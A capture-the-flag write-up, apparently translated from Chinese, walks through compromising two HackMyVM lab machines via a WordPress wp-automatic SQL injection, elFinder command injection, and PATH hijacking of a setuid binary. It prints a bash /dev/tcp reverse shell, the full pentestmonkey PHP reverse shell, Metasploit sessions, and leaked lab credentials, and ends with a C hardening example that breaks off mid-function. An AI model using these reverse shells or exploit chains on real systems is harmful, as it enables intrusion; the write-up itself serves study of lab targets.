[WRN] Loading 189 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1711 (Reduced 1609 Requests)
[INF] Using Interactsh Server: oast.fun
[openssh-detect] [tcp] [info] mamushka.hmv:22 ["SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u3"]
[wordpress-readme-file] [http] [info] http://mamushka.hmv/readme.html
[wordpress-login] [http] [info] http://mamushka.hmv/wp-login.php
[CVE-2024-27956] [http] [critical] http://mamushka.hmv/wp-content/plugins/wp-automatic/inc/csv.php
[form-detection] [http] [info] http://mamushka.hmv
[wordpress-xmlrpc-file] [http] [info] http://mamushka.hmv/xmlrpc.php
[http-missing-security-headers:permissions-policy] [http] [info] http://mamushka.hmv
[http-missing-security-headers:x-frame-options] [http] [info] http://mamushka.hmv
[http-missing-security-headers:x-content-type-options] [http] [info] http://mamushka.hmv
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://mamushka.hmv
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://mamushka.hmv
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://mamushka.hmv
[http-missing-security-headers:strict-transport-security] [http] [info] http://mamushka.hmv
[http-missing-security-headers:content-security-policy] [http] [info] http://mamushka.hmv
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://mamushka.hmv
[http-missing-security-headers:referrer-policy] [http] [info] http://mamushka.hmv
[http-missing-security-headers:clear-site-data] [http] [info] http://mamushka.hmv
[mixed-passive-content:img] [http] [info] http://mamushka.hmv ["http://mamushka.htb/wp-content/uploads/2024/08/mamushka-1.jpg","http://mamushka.htb/wp-content/uploads/2024/08/OIG5-1.jpeg","http://mamushka.htb/wp-content/uploads/2024/08/OIG4.jpeg"]
[tech-detect:font-awesome] [http] [info] http://mamushka.hmv
[tech-detect:php] [http] [info] http://mamushka.hmv
[wp-user-enum:usernames] [http] [low] http://mamushka.hmv/?rest_route=/wp/v2/users/ ["admin"]
[wp-enabled-registration] [http] [info] http://mamushka.hmv/?page_id=14
[wp-license-file] [http] [info] http://mamushka.hmv/license.txt
[addeventlistener-detect] [http] [info] http://mamushka.hmv
[wp-enabled-registration] [http] [info] http://mamushka.hmv/?page_id=14
[apache-detect] [http] [info] http://mamushka.hmv ["Apache/2.4.61 (Debian)"]
[php-detect] [http] [info] http://mamushka.hmv ["8.2.22"]
The scan clearly flags CVE-2024-27956. Searching shows it is a plugin vulnerability, in the WP-Automatic plugin. I looked up PoCs for this plugin on exploit-db, but none of them seemed to work, so let's try searching in msf
msf6 > search WP-Automatic
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/http/wp_automatic_plugin_privesc 2021-09-06 normal Yes WordPress Plugin Automatic Config Change to RCE
1 exploit/multi/http/wp_automatic_sqli_to_rce 2024-03-13 excellent Yes WordPress wp-automatic Plugin SQLi Admin Creation
2 \_ target: PHP In-Memory . . . .
3 \_ target: Unix/Linux Command Shell . . . .
4 \_ target: Windows Command Shell . . . .
Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/wp_automatic_sqli_to_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'
There is a fairly recent one from 2024; let's try it directly
use exploit/multi/http/wp_automatic_sqli_to_rce
show options
set rhost 192.168.1.105
run
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > run
[-] Handler failed to bind to 192.168.1.105:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting SQLi test to verify vulnerability...
[+] The target is vulnerable. Target is vulnerable to SQLi!
[-] Exploit aborted due to failure: unexpected-reply: Failed to log in to WordPress admin.
[*] Exploit completed, but no session was created.
What this module does is add a user; the username and password are herminia.lebsack/j3FYu3YO. But after logging in there is no obvious place to get a reverse shell. Looking at a walkthrough, the approach is to write a PHP script yourself and package it as a zip. The script is as follows:
<?php
/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.104/1234 0>&1'");
?>
Then upload the file and click to activate the plugin; start listening on port 1234 before activating, and the shell comes back. But this WordPress instance appears to run in Docker, as the prompt www-data@3ed5ddfe0e0c:/var/www/html/wp-admin$ shows, so let's first look at the environment variables
www-data@3ed5ddfe0e0c:/var/www/html/wp-admin$ env
HOSTNAME=3ed5ddfe0e0c
PHP_VERSION=8.2.22
APACHE_CONFDIR=/etc/apache2
PHP_INI_DIR=/usr/local/etc/php
GPG_KEYS=39B641343D8C104B2B146DC3F9C39DC0B9698544 E60913E4DF209907D8E30D96659A97C9CF2A795A 1198C0117593497A5EC5C199286AF1F9897469DC
PHP_LDFLAGS=-Wl,-O1 -pie
PWD=/var/www/html/wp-admin
APACHE_LOG_DIR=/var/log/apache2
LANG=C
PHP_SHA256=8566229bc88ad1f4aadc10700ab5fbcec81587c748999d985f11cf3b745462df
APACHE_PID_FILE=/var/run/apache2/apache2.pid
WORDPRESS_DB_HOST=db
PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
PHP_URL=https://www.php.net/distributions/php-8.2.22.tar.xz
APACHE_RUN_GROUP=www-data
APACHE_LOCK_DIR=/var/lock/apache2
SHLVL=2
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
WORDPRESS_DB_PASSWORD=Fukurokuju
APACHE_RUN_DIR=/var/run/apache2
APACHE_ENVVARS=/etc/apache2/envvars
APACHE_RUN_USER=www-data
WORDPRESS_DB_USER=matrioska
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
WORDPRESS_DB_NAME=wordpressdb
PHP_ASC_URL=https://www.php.net/distributions/php-8.2.22.tar.xz.asc
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
_=/usr/bin/env
This gives a username and password
matrioska
Fukurokuju
Trying SSH with them fails. The username looks like the machine name but slightly different, so I tried matrioshka as the username instead; that connects successfully and gives the user flag
matrioshka@matrioshka:~$ ls
user.txt
matrioshka@matrioshka:~$ cat user.txt
c8129b0390452d8378535cff76e0dde8
Privilege escalation: root flag
First download the two tools fscan and socat onto the target
busybox wget 192.168.1.104:9999/fscan
busybox wget 192.168.1.104:9999/socat/socat-1.8.0.3
First check the IP configuration
matrioshka@matrioshka:/tmp$ ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:0e:de:b4 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.105/24 brd 192.168.1.255 scope global dynamic enp0s3
valid_lft 4470sec preferred_lft 4470sec
inet6 fe80::a00:27ff:fe0e:deb4/64 scope link
valid_lft forever preferred_lft forever
3: br-1f21cf17cc68: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:66:6e:80:ab brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-1f21cf17cc68
valid_lft forever preferred_lft forever
inet6 fe80::42:66ff:fe6e:80ab/64 scope link
valid_lft forever preferred_lft forever
5: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:46:3f:c9:d8 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
7: veth223f8be@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-1f21cf17cc68 state UP group default
link/ether 9a:c1:c2:91:86:c9 brd ff:ff:ff:ff:ff:ff link-netnsid 2
inet6 fe80::98c1:c2ff:fe91:86c9/64 scope link
valid_lft forever preferred_lft forever
11: veth657102c@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-1f21cf17cc68 state UP group default
link/ether 3e:4f:8a:8e:2f:33 brd ff:ff:ff:ff:ff:ff link-netnsid 1
inet6 fe80::3c4f:8aff:fe8e:2f33/64 scope link
valid_lft forever preferred_lft forever
12: br-949cb1b62f41: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:f5:08:52:92 brd ff:ff:ff:ff:ff:ff
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-949cb1b62f41
valid_lft forever preferred_lft forever
inet6 fe80::42:f5ff:fe08:5292/64 scope link
valid_lft forever preferred_lft forever
14: vethff4f21f@if13: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-949cb1b62f41 state UP group default
link/ether 0a:a0:95:05:f2:d9 brd ff:ff:ff:ff:ff:ff link-netnsid 3
inet6 fe80::8a0:95ff:fe05:f2d9/64 scope link
valid_lft forever preferred_lft forever
There is an IP 172.19.0.1; scan that range with fscan
matrioshka@matrioshka:/tmp$ ./fscan -h 172.19.0.1/16
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 172.19.0.0-172.19.255.255
[*] 已生成IP范围: 172.19.0.0 - 172.19.255.255
[*] 已解析CIDR 172.19.0.1/16 -> IP范围 172.19.0.0-172.19.255.255
[*] 最终有效主机数量: 65536
[-] 正在尝试无监听ICMP探测...
[-] 当前用户权限不足,无法发送ICMP包
[*] 切换为PING方式探测...
[+] 目标 172.19.0.1 存活 (ICMP)
[+] 目标 172.19.0.2 存活 (ICMP)
Next scan 172.19.0.1-2
matrioshka@matrioshka:/tmp$ ./fscan -h 172.19.0.1-2
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] 已生成IP范围: 172.19.0.1 - 172.19.0.2
[*] 最终有效主机数量: 2
[-] 正在尝试无监听ICMP探测...
[-] 当前用户权限不足,无法发送ICMP包
[*] 切换为PING方式探测...
[+] 目标 172.19.0.2 存活 (ICMP)
[+] 目标 172.19.0.1 存活 (ICMP)
[+] ICMP存活主机数量: 2
[*] 共解析 218 个有效端口
[+] 端口开放 172.19.0.1:80
[+] 端口开放 172.19.0.2:80
[+] 端口开放 172.19.0.1:22
[+] 存活端口数量: 3
[*] 开始漏洞扫描...
[*] 网站标题 http://172.19.0.2 状态码:200 长度:9249 标题:File server
[!] 扫描错误 172.19.0.1:80 - Get "http://172.19.0.1": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[!] 扫描错误 172.19.0.1:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 3/3
[*] 扫描结束,耗时: 6.183240147s
But this is on the internal network and needs to be forwarded out. A tool called socat is used here; you can check its cheat sheet with tldr socat
┌──(root㉿kali-plus)-[~/socat]
└─# tldr socat
Multipurpose relay (SOcket CAT).
More information: <http://www.dest-unreach.org/socat/>.
Listen to a port, wait for an incoming connection and transfer data to STDIO:
sudo socat - TCP-LISTEN:8080,fork
Listen on a port using SSL and print to STDOUT:
sudo socat OPENSSL-LISTEN:4433,reuseaddr,cert=./cert.pem,cafile=./ca.cert.pem,key=./key.pem,verify=0 STDOUT
Create a connection to a host and port, transfer data in STDIO to connected host:
sudo socat - TCP4:www.example.com:80
Forward incoming data of a local port to another host and port:
sudo socat TCP-LISTEN:80,fork TCP4:www.example.com:80
Send data with multicast routing scheme:
echo "Hello Multicast" | socat - UDP4-DATAGRAM:224.0.0.1:5000
Receive data from a multicast:
socat - UDP4-RECVFROM:5000
But my socat kept having problems and would not work; just watch ll10456's walkthrough video
https://www.bilibili.com/video/BV1NXRHYJE14/?vd_source=99de32ae331fc7af197869d5fa80b772
root flag
7f5d6dbbaff0a1fc6d2a5c9160362908
lookup
Information gathering
The IP address is 192.168.1.105
┌──(root㉿kali-plus)-[~]
└─# nmap -p- 192.168.1.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-19 18:24 CST
Nmap scan report for mamushka.hmv (192.168.1.105)
Host is up (0.0034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:90:76:B8 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 11.96 seconds
Ports 22 and 80 are open. Port 80 is a login page. Logging in as admin/admin shows "wrong password", while other usernames show "wrong username or password", which means the user admin exists. So brute-force it directly; no password came out, but when the password is password123 the response is "wrong username or password", meaning the password is right and the username is wrong. The next step is finding a username: brute-forcing with names.txt from SecLists gives the username jose. Looking at the author, it is josemlwdf
After logging in there is a file-management page where you can upload files and so on, but the files provided do not seem useful. The directory is elFinder, so scan that directory first
┌──(root㉿zss)-[/home/zss]
└─# dirsearch -u http://files.lookup.hmv/elFinder
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/zss/reports/http_files.lookup.hmv/_elFinder_25-03-19_20-53-38.txt
Target: http://files.lookup.hmv/
[20:53:38] Starting: elFinder/
[20:53:38] 301 - 326B - /elFinder/js -> http://files.lookup.hmv/elFinder/js/
[20:53:38] 301 - 327B - /elFinder/php -> http://files.lookup.hmv/elFinder/php/
[20:53:54] 200 - 638B - /elFinder/bower.json
[20:53:55] 200 - 54KB - /elFinder/Changelog
[20:53:56] 200 - 1KB - /elFinder/composer.json
[20:53:57] 301 - 327B - /elFinder/css -> http://files.lookup.hmv/elFinder/css/
[20:54:01] 301 - 329B - /elFinder/files -> http://files.lookup.hmv/elFinder/files/
[20:54:01] 200 - 724B - /elFinder/files/
[20:54:03] 301 - 327B - /elFinder/img -> http://files.lookup.hmv/elFinder/img/
[20:54:05] 200 - 532B - /elFinder/js/
[20:54:06] 200 - 1KB - /elFinder/LICENSE.md
[20:54:11] 200 - 427B - /elFinder/package.json
[20:54:12] 200 - 903B - /elFinder/php/
There is a Changelog; let's see if it has any information
* elFinder (2.1.47):
- [js] Fixed #2820 remove Multi-byte space characters
- [js:jqueryelfinder] bugfix of elfinder reload(restart) on dialogelfinder
- [ui:places] Fixed #2822 set title attr correctly
- [ui:tree] add an option `uiOptions.tree.attrTitle` to enable set path info to title attr
- [js:editors.default] support tinyMCE 5 and integrate image uploader
- [js:dialogelfinder] Fixed #2824 freezes browser in uses dialogelfinder
- [ui:button] add CSS class `elfinder-button-{COMMAND NAME}-menu` to submenu
- [ui:sortbutton] Fixed #2829 sort menu is not synchronized with the data of cwd
- [ui:cwd] Fixed #2840 thumbnail is not created when adding an image to an empty folder
- [ui:cwd] Fixed #2836 setting CWD icons size not working
- [php:core] Fixed #2842 allow to cancel upload on upload.presave callback
- [js:core] Fixed #2845 `size` request with wrong params `targets`
- [php:session] Fixed #2857 consideration for environment other than "apache2 SAPI"
- [cmd:fullscreen] Fixed #2858 add an option of fullscreen mode screen/window
- And some minor bug fixes
We can see it is elFinder version 2.1.47. Searching for an exploitable PoC shows there is one, so just use msf
search elFinder
set rhosts files.lookup.hmv
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.1.106:4444
[*] Uploading payload 'UBij6VlJ.jpg;echo 6370202e2e2f66696c65732f5542696a36566c4a2e6a70672a6563686f2a202e6656314b69776f43544c2e706870 |xxd -r -p |sh& #.jpg' (1966 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder/php/.fV1KiwoCTL.php) ...
[*] Sending stage (40004 bytes) to 192.168.1.105
[+] Deleted .fV1KiwoCTL.php
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.105:34664) at 2025-03-19 21:06:45 +0800
[*] No reply
[*] Removing uploaded file ...
[+] Deleted uploaded file
meterpreter > shell -t
[*] env TERM=xterm HISTFILE= /usr/bin/script -qc /bin/bash /dev/null
Process 5494 created.
Channel 0 created.
www-data@lookup:/var/www/files.lookup.hmv/public_html/elFinder/php$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
You can use the reverse.php below to pop another shell into a second window
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.1.106'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is sent down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
Only the IP address needs changing
user flag
$ find / -user root -perm -4000 -print 2>/dev/null
/snap/snapd/19457/usr/lib/snapd/snap-confine
/snap/core20/1950/usr/bin/chfn
/snap/core20/1950/usr/bin/chsh
/snap/core20/1950/usr/bin/gpasswd
/snap/core20/1950/usr/bin/mount
/snap/core20/1950/usr/bin/newgrp
/snap/core20/1950/usr/bin/passwd
/snap/core20/1950/usr/bin/su
/snap/core20/1950/usr/bin/sudo
/snap/core20/1950/usr/bin/umount
/snap/core20/1950/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1950/usr/lib/openssh/ssh-keysign
/snap/core20/1974/usr/bin/chfn
/snap/core20/1974/usr/bin/chsh
/snap/core20/1974/usr/bin/gpasswd
/snap/core20/1974/usr/bin/mount
/snap/core20/1974/usr/bin/newgrp
/snap/core20/1974/usr/bin/passwd
/snap/core20/1974/usr/bin/su
/snap/core20/1974/usr/bin/sudo
/snap/core20/1974/usr/bin/umount
/snap/core20/1974/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1974/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pwm
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
Among them is /usr/sbin/pwm
$ /usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found
This means that if the output of id is think, it will return the contents of .passwords. So the next step is to forge that output; the technique here is environment variable (PATH) hijacking
$ which id
/usr/bin/id
$ cd /tmp
$ pwd
/tmp
$ echo 'echo think' > /tmp/id
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ export PATH=/tmp:$PATH
$ which id
/usr/bin/id
$ chmod +x /tmp/id
$ export PATH=/tmp:$PATH
$ which id
/tmp/id
$ id
think
$ /usr/sbin/pwm
[-] Error reading username from id command
: Success
[!] Running 'id' command to extract the username and user ID (UID)
$ /usr/bin/id think
uid=1000(think) gid=1000(think) groups=1000(think)
$ echo 'echo "uid=1000(think) gid=1000(think) groups=1000(think)"' > /tmp/id
$ /usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: think
jose1006
jose1004
jose1002
jose1001teles
jose100190
jose10001
jose10.asd
jose10+
jose0_07
jose0990
jose0986$
jose098130443
jose0981
jose0924
jose0923
jose0921
thepassword
jose(1993)
jose'sbabygurl
jose&vane
jose&takie
jose&samantha
jose&pam
jose&jlo
jose&jessica
jose&jessi
josemario.AKA(think)
jose.medina.
jose.mar
jose.luis.24.oct
jose.line
jose.leonardo100
jose.leas.30
jose.ivan
jose.i22
jose.hm
jose.hater
jose.fa
jose.f
jose.dont
jose.d
jose.com}
jose.com
jose.chepe_06
jose.a91
jose.a
jose.96.
jose.9298
jose.2856171
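The reason the trick above works is that pwm trusts whatever "id" the caller's PATH resolves to. As an added example (not the pwm binary from the box, and with the allowlist of trusted directories as my own assumption), here is how a setuid helper should do it: take the real uid from the kernel instead of parsing a child's output, reject an untrusted PATH, and pin PATH before spawning anything.

```c
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Added example, not pwm itself: a setuid helper that needs to know who
 * invoked it must not shell out to "id" through the caller's PATH, because
 * /tmp/id can then answer "think" exactly as the session above shows. */

/* Directories a privileged helper may trust in PATH (assumed allowlist). */
static const char *const TRUSTED_DIRS[] = {
    "/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin"
};
#define SAFE_PATH "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

static int dir_is_trusted(const char *dir, size_t len)
{
    for (size_t i = 0; i < sizeof TRUSTED_DIRS / sizeof TRUSTED_DIRS[0]; i++)
        if (strlen(TRUSTED_DIRS[i]) == len && strncmp(TRUSTED_DIRS[i], dir, len) == 0)
            return 1;
    return 0;
}

/* Returns 1 if any PATH component is empty (meaning the current directory),
 * relative, or outside the allowlist: this is the check pwm was missing. */
int path_has_untrusted_dir(const char *path)
{
    const char *p = path;
    for (;;) {
        const char *sep = strchr(p, ':');
        size_t len = sep ? (size_t)(sep - p) : strlen(p);
        if (len == 0 || p[0] != '/' || !dir_is_trusted(p, len))
            return 1;
        if (sep == NULL)
            return 0;
        p = sep + 1;
    }
}

/* Hardened lookup: the real uid comes from the kernel, not from a child
 * process, so nothing in the caller's environment can influence it.
 * Returns NULL if the uid has no passwd entry. */
const char *caller_username(void)
{
    static char name[256];
    struct passwd *pw = getpwuid(getuid());   /* real uid, not the effective one */
    if (pw == NULL)
        return NULL;
    snprintf(name, sizeof name, "%s", pw->pw_name);
    return name;
}

/* If a subprocess is unavoidable, pin PATH before spawning it. */
void reset_path(void)
{
    setenv("PATH", SAFE_PATH, 1);
}

int main(void)
{
    /* Constructed PATH in the shape the session above produced. */
    const char *hijacked = "/tmp:/usr/local/sbin:/usr/bin";
    printf("PATH %s is %s\n", hijacked,
           path_has_untrusted_dir(hijacked) ? "untrusted" : "trusted");
    reset_path();
    const char *who = caller_username();
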